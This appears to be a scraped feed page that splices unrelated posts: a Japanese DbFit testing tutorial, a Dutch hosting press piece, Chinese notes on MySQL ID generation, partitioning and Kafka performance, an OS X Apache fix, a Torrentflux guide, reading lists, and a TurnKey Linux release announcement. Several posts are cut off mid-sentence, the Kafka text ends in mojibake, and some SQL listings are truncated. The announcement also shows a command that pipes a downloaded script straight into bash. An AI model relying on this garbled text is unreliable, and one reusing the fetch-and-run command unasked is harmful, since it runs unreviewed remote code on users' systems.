ブラウザで、http://localhost:8085/[ページ名] にアクセスするとそのURLでページが作成されます。 例えば、http://localhost:8085/HelloWorld にアクセスすると、HelloWorldというページが作られます。


テストコードを書いて、Saveで保存します。 f:id:JHashimoto:20161121170245p:plain


# DbFitのExtensionをFitNesseに読み込む
!path lib/*.jar

# Postgresに接続

# nationが'JAPAN'と一致することをテストする
!|Query|select top 1 trim(c_nation) as nation from customer where c_custkey = 98|


Testをクリックすると、テストが実行され、テスト結果が表示されます。 f:id:JHashimoto:20161121170311p:plain



起動しているコマンドプロンプトでCtrl + Cを入力すると、DbFitが終了します。

          Lamp, Mamp and Wamp        
LAMP is an acronym of Linux Apache, MySQL and PHP. MAMP is an acronym of Mac Apache, MySQL and PHP. And as expected WAMP is an acronym of Windows Apache, MySQL and PHP. They are a download which packages together Apache, MySQL and PHP and allow you to build and host websites locally. It is […]
          Argeweb – Interessante marktmogelijkheden voor hosting door virtualisatie        
Argeweb is gevestigd in Maassluis en heeft eigen serverruimten in onder meer Schiphol-Rijk en Amsterdam. De organisatie had begin 2009 voor haar klanten meer dan 70.000 domeinnamen geregistreerd. Veel domeinnamen resulteren in een website die bij Argeweb gehost wordt. Argeweb beschikt over veel kennis van Windows Server, SQL server en ASP.NET en is sinds 2007 Microsoft Gold Certified partner, onder andere op het gebied van hosting. Argeweb is één van de snelst groeiende providers op het gebied van domeinregistratie en webhosting. Door het inzetten van Windows Server 2008 en Hyper-V virtualisatie is Argeweb in staat haar klanten een hoogwaardig, schaalbaar hostingplatform aan te bieden tegen lage kosten. "Dankzij Hyper-V kan Argeweb haar klanten nu een hoogwaardige virtual dedicated server oplossing aanbieden", aldus de Ruben van der Zwan, IT-manager bij ArgeWeb. Hij licht toe: "Op één fysieke server kunnen wij wel 35 virtuele servers draaien. Dat staat gelijk aan een ruimtebesparing van een factor 6 à 7 en een evenredig lager stroomverbruik. De betrouwbaarheid blijft daarbij gegarandeerd door de inzet van professionele hardware met de beste supportcontracten." Nu de fysieke servers aanzienlijk efficiënter benut worden en tegelijkertijd goed beheerbaar blijven, kan Argeweb de markt een zeer voordelig hostingproduct aanbieden, inclusief ondersteuning van PHP5 en MySQL. De webserver van Windows Server 2008 voegt daaraan bovendien nog ondersteuning toe voor Frontpage Server Extensies, ASP.NET, classic ASP, Silverlight, AJAX en zowel PHP4 als PHP5 tegelijk. "De ruime ondersteuning die Windows Server 2008 biedt, in combinatie met de voordelen van virtualisatie, hebben ons doen besluiten om elk nieuw hostingpakket te laten draaien op Windows Server 2008, tenzij de klant anders beslist," aldus de heer Van der Zwan.

借用MySQL 的 auto_increment 特性可以产生唯一的可靠ID。

表定义,关键在于auto_increment,和UNIQUE KEY的设置:

CREATE TABLE `Tickets64` (
  `id` bigint(20) unsigned NOT NULL auto_increment,
  `stub` char(1) NOT NULL default '',
  PRIMARY KEY  (`id`),
  UNIQUE KEY `stub` (`stub`)

需要使用时,巧用replace into语法来获取值,结合表定义的UNIQUE KEY,确保了一条记录就可以满足ID生成器的需求:

REPLACE INTO Tickets64 (stub) VALUES ('a');


It is multi-user safe because multiple clients can issue the UPDATE statement and
get their own sequence value with the SELECT statement (or mysql_insert_id()),
without affecting or being affected by other clients that generate their own sequence values.

需要注意的是,若client采用PHP,则不能使用mysql_insert_id()获取ID,原因见《mysql_insert_id() 在bigint型AI字段遇到的问题》:http://kaifage.com/notes/99/mysql-insert-id-issue- with-bigint-ai-field.html。

Flickr 采取了此方案: http://code.flickr.net/2010/02/08/ticket-servers-distributed-unique-primary-keys-on-the-cheap/




SIMONE 2016-06-28 18:48 发表评论


mysql 5.1已经到了beta版,官方网站上也陆续有一些文章介绍,比如上次看到的Improving Database Performance with Partitioning。在使用分区的前提下,可以用mysql实现非常大的数据量存储。今天在mysql的站上又看到一篇进阶的文章 —— 按日期分区存储。如果能够实现按日期分区,这对某些时效性很强的数据存储是相当实用的功能。下面是从这篇文章中摘录的一些内容。



  1. mysql>  create table rms (d date)
  2.     ->  partition by range (d)
  3.     -> (partition p0 values less than ('1995-01-01'),
  4.     ->  partition p1 VALUES LESS THAN ('2010-01-01'));



ERROR 1064 (42000): VALUES value must be of same type as partition function near '),
partition p1 VALUES LESS THAN ('2010-01-01'))' at line 3


  1. mysql> CREATE TABLE part_date1
  2.     ->      (  c1 int default NULL,
  3.     ->  c2 varchar(30) default NULL,
  4.     ->  c3 date default NULL) engine=myisam
  5.     ->      partition by range (cast(date_format(c3,'%Y%m%d') as signed))
  6.     -> (PARTITION p0 VALUES LESS THAN (19950101),
  7.     -> PARTITION p1 VALUES LESS THAN (19960101) ,
  8.     -> PARTITION p2 VALUES LESS THAN (19970101) ,
  9.     -> PARTITION p3 VALUES LESS THAN (19980101) ,
  10.     -> PARTITION p4 VALUES LESS THAN (19990101) ,
  11.     -> PARTITION p5 VALUES LESS THAN (20000101) ,
  12.     -> PARTITION p6 VALUES LESS THAN (20010101) ,
  13.     -> PARTITION p7 VALUES LESS THAN (20020101) ,
  14.     -> PARTITION p8 VALUES LESS THAN (20030101) ,
  15.     -> PARTITION p9 VALUES LESS THAN (20040101) ,
  16.     -> PARTITION p10 VALUES LESS THAN (20100101),
  18. Query OK, 0 rows affected (0.01 sec)



  1. mysql> explain partitions
  2.     -> select count(*) from part_date1 where
  3.     ->      c3> date '1995-01-01' and c3 <date '1995-12-31'\G
  4. *************************** 1. row ***************************
  5.            id: 1
  6.   select_type: SIMPLE
  7.         table: part_date1
  8.    partitions: p0,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11
  9.          type: ALL
  10. possible_keys: NULL
  11.           key: NULL
  12.       key_len: NULL
  13.           ref: NULL
  14.          rows: 8100000
  15.         Extra: Using where
  16. 1 row in set (0.00 sec)





  • TO_DAYS()
  • YEAR()


  1. mysql> CREATE TABLE part_date3
  2.     ->      (  c1 int default NULL,
  3.     ->  c2 varchar(30) default NULL,
  4.     ->  c3 date default NULL) engine=myisam
  5.     ->      partition by range (to_days(c3))
  6.     -> (PARTITION p0 VALUES LESS THAN (to_days('1995-01-01')),
  7.     -> PARTITION p1 VALUES LESS THAN (to_days('1996-01-01')) ,
  8.     -> PARTITION p2 VALUES LESS THAN (to_days('1997-01-01')) ,
  9.     -> PARTITION p3 VALUES LESS THAN (to_days('1998-01-01')) ,
  10.     -> PARTITION p4 VALUES LESS THAN (to_days('1999-01-01')) ,
  11.     -> PARTITION p5 VALUES LESS THAN (to_days('2000-01-01')) ,
  12.     -> PARTITION p6 VALUES LESS THAN (to_days('2001-01-01')) ,
  13.     -> PARTITION p7 VALUES LESS THAN (to_days('2002-01-01')) ,
  14.     -> PARTITION p8 VALUES LESS THAN (to_days('2003-01-01')) ,
  15.     -> PARTITION p9 VALUES LESS THAN (to_days('2004-01-01')) ,
  16.     -> PARTITION p10 VALUES LESS THAN (to_days('2010-01-01')),
  18. Query OK, 0 rows affected (0.00 sec)



  1. mysql> explain partitions
  2.     -> select count(*) from part_date3 where
  3.     ->      c3> date '1995-01-01' and c3 <date '1995-12-31'\G
  4. *************************** 1. row ***************************
  5.            id: 1
  6.   select_type: SIMPLE
  7.         table: part_date3
  8.    partitions: p1
  9.          type: ALL
  10. possible_keys: NULL
  11.           key: NULL
  12.       key_len: NULL
  13.           ref: NULL
  14.          rows: 808431
  15.         Extra: Using where
  16. 1 row in set (0.00 sec)



  1. mysql> select count(*) from part_date3 where
  2.     ->      c3> date '1995-01-01' and c3 <date '1995-12-31';
  3. +----------+
  4. | count(*) |
  5. +----------+
  6.  805114 |
  7. +----------+
  8. 1 row in set (4.11 sec)
  10. mysql> select count(*) from part_date1 where
  11.     ->      c3> date '1995-01-01' and c3 <date '1995-12-31';
  12. +----------+
  13. | count(*) |
  14. +----------+
  15.  805114 |
  16. +----------+
  17. 1 row in set (40.33 sec)




CEILING() and FLOOR() (在使用这2个函数的建立分区表的前提是使用函数的分区键是INT类型),例如

mysql> CREATE TABLE t (c FLOAT) PARTITION BY LIST( FLOOR(c) )(     -> PARTITION p0 VALUES IN (1,3,5),     -> PARTITION p1 VALUES IN (2,4,6)     -> );; ERROR 1491 (HY000): The PARTITION function returns the wrong type   mysql> CREATE TABLE t (c int) PARTITION BY LIST( FLOOR(c) )(     -> PARTITION p0 VALUES IN (1,3,5),     -> PARTITION p1 VALUES IN (2,4,6)     -> ); Query OK, 0 rows affected (0.01 sec) 


SIMONE 2016-06-07 18:06 发表评论

          Kafka 高性能吞吐揭秘        


1.    Topic:用于划分Message的逻辑概念,一个Topic可以分布在多个Broker上。

2.    Partition:是Kafka中横向扩展和一切并行化的基础,每个Topic都至少被切分为1个Partition。

3.    Offset:消息在Partition中的编号,编号顺序不跨Partition。

4.    Consumer:用于从Broker中取出/消费Message。

5.    Producer:用于往Broker中发送/生产Message。

6.    Replication:Kafka支持以Partition为单位对Message进行冗余备份,每个Partition都可以配置至少1个Replication(当仅1个Replication时即仅该Partition本身)。

7.    Leader:每个Replication集合中的Partition都会选出一个唯一的Leader,所有的读写请求都由Leader处理。其他Replicas从Leader处把数据更新同步到本地,过程类似大家熟悉的MySQL中的Binlog同步。

8.    Broker:Kafka中使用Broker来接受Producer和Consumer的请求,并把Message持久化到本地磁盘。每个Cluster当中会选举出一个Broker来担任Controller,负责处理Partition的Leader选举,协调Partition迁移等工作。

9.    ISR(In-Sync Replica):是Replicas的一个子集,表示目前Alive且与Leader能够“Catch-up”的Replicas集合。由于读写都是首先落到Leader上,所以一般来说通过同步机制从Leader上拉取数据的Replica都会和Leader有一些延迟(包括了延迟时间和延迟条数两个维度),任意一个超过阈值都会把该Replica踢出ISR。每个Partition都有它自己独立的ISR。




首先,说“规规矩矩”是因为Kafka在磁盘上只做Sequence I/O,由于消息系统读写的特殊性,这并不存在什么问题。关于磁盘I/O的性能,引用一组Kafka官方给出的测试数据(Raid-5,7200rpm):

Sequence I/O: 600MB/s

Random I/O: 100KB/s

所以通过只做Sequence I/O的限制,规避了磁盘访问速度低下对性能可能造成的影响。




·         如果在Heap内管理缓存,JVM的GC线程会频繁扫描Heap空间,带来不必要的开销。如果Heap过大,执行一次Full GC对系统的可用性来说将是极大的挑战。

·         所有在在JVM内的对象都不免带有一个Object Overhead(千万不可小视),内存的有效空间利用率会因此降低。

·         所有的In-Process Cache在OS中都有一份同样的PageCache。所以通过将缓存只放在PageCache,可以至少让可用缓存空间翻倍。

·         如果Kafka重启,所有的In-Process Cache都会失效,而OS管理的PageCache依然可以继续使用。


1.    OS 从硬盘把数据读到内核区的PageCache。

2.    用户进程把数据从内核区Copy到用户区。

3.    然后用户进程再把数据写入到Socket,数据流入内核区的Socket Buffer上。

4.    OS 再把数据从Buffer中Copy到网卡的Buffer上,这样完成一次发送。

整个过程共经历两次Context Switch,四次System Call。同一份数据在内核Buffer与用户Buffer之间重复拷贝,效率低下。其中2、3两步没有必要,完全可以直接在内核区完成数据拷贝。这也正是Sendfile所解决的问题,经过Sendfile优化后,整个I/O过程就变成了下面这个样子。


(20 Brokers, 75 Partitions per Broker, 110k msg/s)

此时的集群只有写,没有读操作。10M/s左右的Send的流量是Partition之间进行Replicate而产生的。从recv和writ的速率比较可以看出,写盘是使用Asynchronous+Batch的方式,底层OS可能还会进行磁盘写顺序优化。而在有Read Request进来的时候分为两种情况,第一种是内存中完成数据交换。



其他指标还是老样子,而磁盘Read已经飚高到40+MB/s。此时全部的数据都已经是走硬盘了(对硬盘的顺序读取OS层会进行Prefill PageCache的优化)。依然没有任何性能问题。


1.    Kafka官方并不建议通过Broker端的log.flush.interval.messages和log.flush.interval.ms来强制写盘,认为数据的可靠性应该通过Replica来保证,而强制Flush数据到磁盘会对整体性能产生影响。

2.    可以通过调整/proc/sys/vm/dirty_background_ratio和/proc/sys/vm/dirty_ratio来调优性能。

a.    脏页率超过第一个指标会启动pdflush开始Flush Dirty PageCache。

b.    脏页率超过第二个指标会阻塞所有的写操作来进行Flush。

c.    根据不同的业务需求可以适当的降低dirty_background_ratio和提高dirty_ratio。



扩展性方面。首先,Kafka允许Partition在集群内的Broker之间任意移动,以此来均衡可能存在的数据倾斜问题。其次,Partition支持自定义的分区算法,例如可以将同一个Key的所有消息都路由到同一个Partition上去。 同时Leader也可以在In-Sync的Replica中迁移。由于针对某一个Partition的所有读写请求都是只由Leader来处理,所以Kafka会尽量把Leader均匀的分散到集群的各个节点上,以免造成网络流量过于集中。

并发方面。任意Partition在某一个时刻只能被一个Consumer Group内的一个Consumer消费(反过来一个Consumer则可以同时消费多个Partition),Kafka非常简洁的Offset机制最小化了Broker和Consumer之间的交互,这使Kafka并不会像同类其他消息队列一样,随着下游Consumer数目的增加而成比例的降低性能。此外,如果多个Consumer恰巧都是消费时间序上很相近的数据,可以达到很高的PageCache命中率,因而Kafka可以非常高效的支持高并发读操作,实践中基本可以达到单机网卡上限。

不过,Partition的数量并不是越多越好,Partition的数量越多,平均到每一个Broker上的数量也就越多。考虑到Broker宕机(Network Failure, Full GC)的情况下,需要由Controller来为所有宕机的Broker上的所有Partition重新选举Leader,假设每个Partition的选举消耗10ms,如果Broker上有500个Partition,那么在进行选举的5s的时间里,对上述Partition的读写操作都会触发LeaderNotAvailableException。

再进一步,如果挂掉的Broker是整个集群的Controller,那么首先要进行的是重新任命一个Broker作为Controller。新任命的Controller要从Zookeeper上获取所有Partition的Meta信息,获取每个信息大概3-5ms,那么如果有10000个Partition这个时间就会达到30s-50s。而且不要忘记这只是重新启动一个Controller花费的时间,在这基础上还要再加上前面说的选举Leader的时间 -_-!!!!!!



1.    Partition的数量尽量提前预分配,虽然可以在后期动态增加Partition,但是会冒着可能破坏Message Key和Partition之间对应关系的风险。

2.    Replica的数量不要过多,如果条件允许尽量把Replica集合内的Partition分别调整到不同的Rack。

3.    尽一切努力保证每次停Broker时都可以Clean Shutdown,否则问题就不仅仅是恢复服务所需时间长,还可能出现数据损坏或其他很诡异的问题。






当然用户也可以选择自己在应用层上做压缩和解压的工作(毕竟Kafka目前支持的压缩算法有限,只有GZIP和Snappy),不过这样做反而会意外的降低效率!!!! Kafka的End-to-End压缩与MessageSet配合在一起工作效果最佳,上面的做法直接割裂了两者间联系。至于道理其实很简单,压缩算法中一条基本的原理“重复的数据量越多,压缩比越高”。无关于消息体的内容,无关于消息体的数量,大多数情况下输入数据量大一些会取得更好的压缩比。


为了解决这个问题,Kafka在0.8版本的设计借鉴了网络当中的ack机制。如果对性能要求较高,又能在一定程度上允许Message的丢失,那就可以设置request.required.acks=0 来关闭ack,以全速发送。如果需要对发送的消息进行确认,就需要设置request.required.acks为1或-1,那么1和-1又有什么区别呢?这里又要提到前面聊的有关Replica数量问题。如果配置为1,表示消息只éœ

          Apache, MySQL and PHP in OS X Mavericks 10.9        
Unfortunately upgrading from OS X Mountain Lion ( 10.8) to Mavericks (10.9) stopped my AMP (Apache, MySQL, PHP) installation working.

Luckily, this is just down to an apache configuration file being overwritten and is easy to correct...

1. Edit Apache Configuration

sudo vi /private/etc/apache2/httpd.conf

a. Uncomment following line to re-enable virtual hosts: -

    Include /private/etc/apache2/extra/httpd-vhosts.conf

b. Uncomment following line to re-enable PHP: -

    LoadModule php5_module libexec/apache2/libphp5.so

2. Restart Apache

sudo apachectl restart

There was no need to change any of my MySQL installation, this continued working after the installation.

          Installing Torrentflux on the Viglen MPC-L        
This is a quick guide to installing Torrentflux on my Viglen MPC-L.

First, make sure that python, mysql-server and mysql-client are installed.

Then simply install the software with apt-get: -
    sudo apt-get install torrentflux

Once it is installed, point your web browser at the following location (where a.b.c.d is the IP address of your Viglen).: -


...and then start uploading .torrent files to it.

By default, files are saved in the following location: -

By default, the ports used are 49160- 49300, so remember to open these on your firewall/router.
          Fall 2016 tech reading        
It's almost the end of the year, so here's another big list to go through while you wait at the airport on your way to your vacation.


Streaming JSON and JAX-RS streaming

Java Strings

Data - Small and Big

Channels and Actors



Misc Science/Tech

Misc - Fun, Tidbits

Happy holidays!

          Fall 2015 tech reading        
Big systems:
Until next time!
          Summer 2015 tech reading and goodies        
Graph and other stores:
  • http://www.slideshare.net/HBaseCon/use-cases-session-5
  • http://www.datastax.com/dev/blog/tales-from-the-tinkerpop
  • TAO: Facebook's Distributed Data Store for the Social Graph
    Architecture & Implementation
    All of the data for objects and associations is stored in MySQL. A non-SQL store could also have been used, but when looking at the bigger picture SQL still has many advantages:
    …it is important to consider the data accesses that don’t use the API. These include back-ups, bulk import and deletion of data, bulk migrations from one data format to another, replica creation, asynchronous replication, consistency monitoring tools, and operational debugging. An alternate store would also have to provide atomic write transactions, efficient granular writes, and few latency outliers
  • Twitter Heron: Stream Processing at Scale
    Storm has no backpressure mechanism. If the receiver component is unable to handle incoming data/tuples, then the sender simply drops tuples. This is a fail-fast mechanism, and a simple strategy, but it has the following disadvantages:
    Second, as mentioned in [20], Storm uses Zookeeper extensively to manage heartbeats from the workers and the supervisors. use of Zookeeper limits the number of workers per topology, and the total number of topologies in a cluster, as at very large numbers, Zookeeper becomes the bottleneck.
    Hence in Storm, each tuple has to pass through four threads from the point of entry to the point of exit inside the worker proces2. This design leads to significant overhead and queue contention issues.
    Furthermore, each worker can run disparate tasks. For example, a Kafka spout, a bolt that joins the incoming tuples with a Twitter internal service, and another bolt writing output to a key-value store might be running in the same JVM. In such scenarios, it is difficult to reason about the behavior and the performance of a particular task, since it is not possible to isolate its resource usage. As a result, the favored troubleshooting mechanism is to restart the topology. After restart, it is perfectly possible that the misbehaving task could be scheduled with some other task(s), thereby making it hard to track down the root cause of the original problem.
    Since logs from multiple tasks are written into a single file, it is hard to identify any errors or exceptions that are associated with a particular task. The situation gets worse quickly if some tasks log a larger amount of information compared to other tasks. Furthermore, an unhandled exception in a single task takes down the entire worker process, thereby killing other (perfectly fine) running tasks. Thus, errors in one part of the topology can indirectly impact the performance of other parts of the topology, leading to high variance in the overall performance. In addition, disparate tasks make garbage collection related-issues extremely hard to track down in practice.
    For resource allocation purposes, Storm assumes that every worker is homogenous. This architectural assumption results in inefficient utilization of allocated resources, and often results in over-provisioning. For example, consider scheduling 3 spouts and 1 bolt on 2 workers. Assuming that the bolt and the spout tasks each need 10GB and 5GB of memory respectively, this topology needs to reserve a total of 15GB memory per worker since one of the worker has to run a bolt and a spout task. This allocation policy leads to a total of 30GB of memory for the topology, while only 25GB of memory is actually required; thus, wasting 5GB of memory resource. This problem gets worse with increasing number of diverse components being packed into a worker
    A tuple failure anywhere in the tuple tree leads to failure of the entire tuple tree . This effect is more pronounced with high fan-out topologies where the topology is not doing any useful work, but is simply replaying the tuples.
    The next option was to consider using another existing open- source solution, such as Apache Samza [2] or Spark Streaming [18]. However, there are a number of issues with respect to making these systems work in its current form at our scale. In addition, these systems are not compatible with Storm’s API. Rewriting the existing topologies with a different API would have been time consuming resulting in a very long migration process. Also note that there are different libraries that have been developed on top of the Storm API, such as Summingbird [8], and if we changed the underlying API of the streaming platform, we would have to change other components in our stack.
Until next time!

          TurnKey 13 out, TKLBAM 1.4 now backup/restores any Linux system        

This is really two separate announcements rolled into one:

  1. TurnKey 13 - codenamed "satisfaction guaranteed or your money back!"

    The new release celebrates 5 years since TurnKey's launch. It's based on the latest version of Debian (7.2) and includes 1400 ready-to-use images: 330GB worth of 100% open source, guru integrated, Linux system goodness in 7 build types that are optimized and pre-tested for nearly any deployment scenario: bare metal, virtual machines and hypervisors of all kinds, "headless" private and public cloud deployments, etc.

    New apps in this release include OpenVPN, Observium and Tendenci.

    We hope this new release reinforces the explosion in active 24x7 production deployments (37,521 servers worldwide) we've seen since the previous 12.1 release, which added 64-bit support and the ability to rebuild any system from scratch using TKLDev, our new self-contained build appliance (AKA "the mothership").

    To visualize active deployments world wide, I ran the archive.turnkeylinux.org access logs through GeoIPCity and overlaid the GPS coordinates on this Google map (view full screen):


  2. TKLBAM 1.4 - codenamed "give me liberty or give me death!"

    Frees TKLBAM from its shackles so it can now backup files, databases and package management state without requiring TurnKey Linux, a TurnKey Hub account or even a network connection. Having those will improve the usage experience, but the new release does its best with what you give it.

    I've created a convenience script to help you install it in a few seconds on any Debian or Ubuntu derived system:

    wget -O - -q $URL | PACKAGE=tklbam /bin/bash

    There's nothing preventing TKLBAM from working on non Debian/Ubuntu Linux systems as well, you just need to to install from source and disable APT integration with the --skip-packages option.

    Other highlights: support for PostgreSQL, MySQL views & triggers, and a major usability rehaul designed to make it easier to understand and control how everything works. Magic can be scary in a backup tool.

    Here's a TurnKey Hub screenshot I took testing TKLBAM on various versions of Ubuntu:

    Screenshot of TurnKey Hub backups

Announcement late? Blame my problem child

As those of you following TurnKey closely may have already noticed, the website was actually updated with the TurnKey 13.0 images a few weeks ago.

I was supposed to officially announce TurnKey 13's release around the same time but got greedy and decided to wrap up TKLBAM 1.4 first and announce them together.

TKLBAM 1.4 wasn't supposed to happen. That it did is the result of a spontaneous binge of passionate development I got sucked into after realizing how close I was to making it a lot more useful to a lot more people. From the release notes:

More people would find TKLBAM useful if:

  • If it worked on other Linux distributions (e.g., Debian and Ubuntu to begin with)

  • If users understood how it worked and realized they were in control. Magic is scary in a backup tool.

  • If it worked without the TurnKey Hub or better yet without needing a network connection at all.

  • If users realized that TKLBAM works with all the usual non-cloud storage back-ends such as the local filesystem, rsync, ftp, ssh, etc.

  • If users could more easily tell when something is wrong, diagnose the problem and fix it without having to go through TKLBAM's code or internals

  • If users could mix and match different parts of TKLBAM as required (e.g., the part that identifies system changes, the part that interfaces with Duplicity to incrementally update their encrypted backup archives, etc.)

  • If users could embed TKLBAM in their existing backup solutions

  • If users realized TKLBAM allowed them to backup different things at different frequencies (e.g., the database every hour, the code every day, the system every week)

    Monolithic all-or-nothing system-level backups are not the only way to go.

  • If it could help with broken migrations (e.g., restoring a backup from TurnKey Redmine 12 to TurnKey Redmine 13)

  • If it worked more robustly, tolerated failures, and with fewer bugs

So that's why the release announcement is late and Alon is slightly pissed off but I'm hoping the end result makes up for it.

TurnKey 13: from 0.5GB to 330GB in 5 years

Big things have small beginnings. We launched TurnKey Linux five years ago in 2008 as a cool side project that took up 0.5GB on SourceForge and distributed 3 installable Live CD images of LAMP stack, Drupal and Joomla.

5 years later the project has ballooned to over 330GB spanning 1400 images: 100 apps, 7 build types, in both 64-bit and 32-bit versions. So now we're getting upset emails from SourceForge asking if the project really needs to take up so much disk space.

Yes, and sorry about that. For what it's worth, realizing TurnKey may eventually outgrow SourceForge is part of the reason we created our own independent mirror network (well, that and rsync/ftp access). Sourceforge is great, but just in case...

93,555 lines of code in 177 git repos

In terms of development, I recently collected stats on the 177 git repositories that make up the app library, self-contained build system, and a variety of custom components (e.g., TKLBAM, the TurnKey Hub).

It turns out over the years we've written about 93,555 lines of code just for TurnKey, most of it in Python and shell script. Check it out:

Late but open (and hopefully worth it)

TurnKey 13 came out a few months later than we originally planned. By now we have a pretty good handle on what it takes to push out a release so the main reason for the delay was that we kept moving the goal posts.

In a nutshell, we decided it was more important for the next major TurnKey release to be open than it was to come out early.

The main disadvantage was that Debian 7 ("Wheezy") had come out in the meantime and TurnKey 12 was based on Debian 6 ("Squeeze"). On the other hand Debian 6 would be supported for another year and since TurnKey is just Debian under the hood nothing prevented impatient users who wanted to upgrade the base operating system to Debian 7 to go through the usual automated and relatively painless Debian upgrade procedure.

So we first finished work on TKLDev, put it through the trenches with the TurnKey 12.1 maintenance release, and moved the project's development infrastructure to GitHub where all development could happen out in the open.

We hoped to see a steady increase in future open source collaboration on TurnKey's development and so far so good. I don't expect the sea to part as it takes more than just the right tools & infrastructure to really make an open source project successful. It takes community and community building takes time. TurnKey needs to win over contributors one by one.

Alon called TurnKey 13.0 "a community effort" which I think in all honesty may have been a bit premature, but we are seeing the blessed beginnings of the process in the form of a steadily growing stream of much appreciated community contributions. Not just new prototype TurnKey apps and code submissions but also more bug reports, feature requests and wiki edits.

And when word gets out on just how fun and easy it is to roll your own Linux distribution I think we'll see more of that too. Remember, with TKLDev, rolling your own Debian based Linux distribution is as easy as running make:

root@tkldev ~$ cd awesomenix
root@tkldev turnkey/awesomenix$ make

You don't even have to use TKLDev to build TurnKey apps or use any TurnKey packages or components. You can build anything you want!

Sadly, I've gotten into the nasty habit of prepending TKL - the TurnKey initials - to all the TurnKey related stuff I develop but under the hood the system is about as general purpose as it can get. It's also pretty well designed and easy to use, if I don't (cough) say so myself.

I'll be delighted if you use TKLDev to help us improve TurnKey but everyone is more than welcome to use it for other things as well.

3 new TurnKey apps - OpenVPN, Tendenci and Observium

  • OpenVPN: a full-featured open source SSL VPN solution that accommodates a wide range of configurations, including remote access, site-to-site VPNs, Wi-Fi security, and more.

    Matt Ayers from Amazon asked us to consider including an OpenVPN appliance in the next release and Alon blew it out of the park with the integration for this one.

    The new TurnKey OpenVPN is actually a 3 for 1 - TurnKey's setup process asks whether you want OpenVPN in client, server or gateway mode and sets things up accordingly.

    My favourite feature is the one that allows the admin to create self destructing URLs with scannable QRcodes that makes setting up client OpenVPN profiles on mobiles a breeze. That's pretty cool.

  • Tendenci: a content management system built specifically for NPOs (Non Profit Organizations).

    Upstream's Jenny Qian did such an excellent job developing the new TurnKey app that we accepted it into the library with only a few tiny modifications.

    This is the first time an upstream project has used TKLDev to roll their own TurnKey app. It would be awesome to see more of this happening and we'll be happy to aid any similar efforts in this vain any way we can.

  • Observium: a really cool autodiscovering SNMP based network monitoring platform.

    The new TurnKey app is based on a prototype developed by Eric Young, who also developed a few other prototype apps which we plan on welcoming into the library as soon as we work out the kinks. Awesome work Eric!

Special thanks

Contributing developers:

Extra special thanks

  • Alon's wife Hilla: for putting up with too many late work sessions.
  • Liraz's girlfriend Shir: for putting up with such a difficult specimen (in general).

          Announcing TurnKey Linux 12.0: 100+ ready-to-use solutions        


Ladies and gentlemen, the 12.0 release is finally out after nearly 6 months of development and just in time to celebrate TurnKey's 4th anniversary. I'm proud to announce we've more than doubled the size of the TurnKey Linux library, from 45 appliances to over 100!

As usual pushing out the release was much more work than we expected. I'd like to chalk that up to relentless optimism in the face of vulgar practical realities and basic common sense. On the flip side, we now have 100+ appliances of which 60+ are brand spanking new. Lots of good new applications are now supported.

Despite all the hard work, or maybe because of it, working on the release was the most fun I've had in a while.

You look away and then back and suddenly all this new open source stuff is out there, ready for prime time. So many innovations and competing ideas, all this free energy. We feel so privileged to have a front row seat and not just watch it all play out but also be able to play our own small role in showcasing so much high-quality open source work while making it just a bit more accessible to users.

Unlike previous releases this latest release is based on Debian, not Ubuntu. We realize this may upset hardcore Ubuntu fans but if you read on, I'll try to explain below why "defecting" to Debian was the right thing for TurnKey.

What's new?

Deprecated appliances

  • AppEngine: With the addition of Go, we decided to split the Google App Engine SDK appliance into 3 separate language specific appliances (appengine-go, appengine-java and appengine-python).
  • Joomla16: 1.6 has reached end-of-life, and has been replaced with the Joomla 2.5 appliance.
  • EC2SDK: Insufficient amount of interest to warrant maintenance, especially now that the TurnKey Hub exists.
  • Zimbra and OpenBravo: Will be re-introduced once TurnKey supports 64bit architectures. Sorry folks. We're still working on that.

Changes common to all TurnKey appliances - the TurnKey Core

As most of you know TurnKey Core is the base appliance on top of which all other TurnKey appliances are built and includes all the standard goodies.

Most of the ingredients Core is built out of comes directly from the Debian package repositories. Thanks to the quality of packaging refreshing these is usually very easy. A handful (e.g., webmin, shellinabox) we have to package ourselves directly from upstream because they're not in Debian. That takes more work, but still usually not a big deal.

Then there are the parts of TurnKey we developed ourselves from scratch. They're our babies and giving them the love they need usually involves more work than all the other maintenance upgrades put together. The largest of these components is TKLBAM - AKA the TurnKey Linux Backup and Migration system.

Version 1.2 of TKLBAM which went into the release received a round of much needed improvements.

The highlights:

  • Backup
    • Resume support allows you to easily recover and continue aborted backup sessions.
    • Multipart parallel S3 uploads dramatically speed up how long it takes to upload backup archives to the cloud. Dial this up high enough and you can typically fully saturate your network connection.
  • Restore
    • Added embedded squid download cache to make it easier to retry failed restores (especially large multi-GB restores!) without resorting to suicide.
    • Fixed the annoying MySQL max_packet issue that made it unnecessarily difficult to restore large tables.

In a bid to open up development to the community we've also tried to make TKLBAM more developer friendly by making its internals easier to explore via the "internals" command. We've also put the project up on GitHub. For a bit more detail, read the full the release notes for TKLAM 1.2.

TurnKey 12.0 appliances available in 7 delicious flavors

Optimized Builds

  1. ISO: Our bread and butter image format. Can be burned on a CD and run almost anywhere - including bare metal or any supported virtualization platform.
  2. Amazon EC2: 1,414 Amazon EC2 optimized builds, spanning the globe in all 7 regions, in both S3 and EBS backed flavors. The Hub has been updated and all images are available for immediate deployment.
  3. VMDK / OVF: For those of you who like a slice of virtual in your lemonade, we've got VMDK and OVF optimized builds for you too.
  4. OpenStack: The new kid on the block, OpenStack optimized builds are just a download away, get 'em while they're hot. Oh, and don't forget that these builds require a special initrd.
  5. OpenVZ : Is OpenVZ your sweet tooth? Step right up! Using Proxmox VE? The TurnKey PVE channel has been updated as well for inline download and deployment right from your web browser.
  6. Xen: And who can forget about our favorite steady rock, optimized builds for Xen based hosting providers are at your fingertips.

Want just one appliance? Follow the download links on the site to download any image in any flavor individually from SourceForge.

Want to collect them all? Thanks to the good people manning TurnKey's mirror network, you can now get all the images in a particular image format (about 20 GB) or even the whole 120 GB enchilada.


  • 7 build formats
  • 606 downloadable virtual appliance images (120 GB worth)

Ubuntu vs Debian: the heart says Ubuntu, but the brains says Debian

One of the hardest things we had to do for this release was choose between Ubuntu and Debian. We initially planned on doing both. Then eventually we realized that would nearly double the amount of testing we had to do - a major bottleneck when you're doing a 100+ appliances.

Think about it. At this scale every one hour worth of extra testing and bugfixing translates into about 2-3 weeks of extra manwork. And to what ends? We already had way too much work to do, and the release kept getting pushed back, again and again, did it really matter whether we supported both of them like we originally intended? Would it really provide enough extra value to users to warrant the cost? They were after all quite similar...

In the end, choosing to switch over to Debian and abandon Ubuntu support for now was hard emotionally but easy on a purely rational, technical basis:

